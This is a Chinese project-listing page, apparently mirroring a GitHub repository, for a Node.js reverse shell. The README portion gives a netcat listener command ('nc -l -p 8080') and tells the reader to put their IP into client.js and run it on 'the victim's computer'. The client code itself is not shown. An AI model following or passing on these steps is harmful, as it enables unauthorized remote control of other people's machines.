注册
登录
java
>>
ReverseShell
>>
返回
项目作者:
JoPowerTech
项目描述 :
Reverse shell made in node.js
高级语言:
JavaScript
项目主页:
项目地址:
git://github.com/JoPowerTech/ReverseShell.git
创建时间:
2021-05-12T18:10:18Z
项目社区:
https://github.com/JoPowerTech/ReverseShell
开源协议:
MIT License
下载
Reverse Shell
Reverse Shell made in Node.js, to use open a port and listen to it. You can do this easily with netcat.
nc
-
l
-
p
8080
Now put your IP in the IP variable inside the client.js file
var
IP
=
"YOU IP"
Now run the client.js file on the victim’s computer, make sure she has the node and lib child_process installed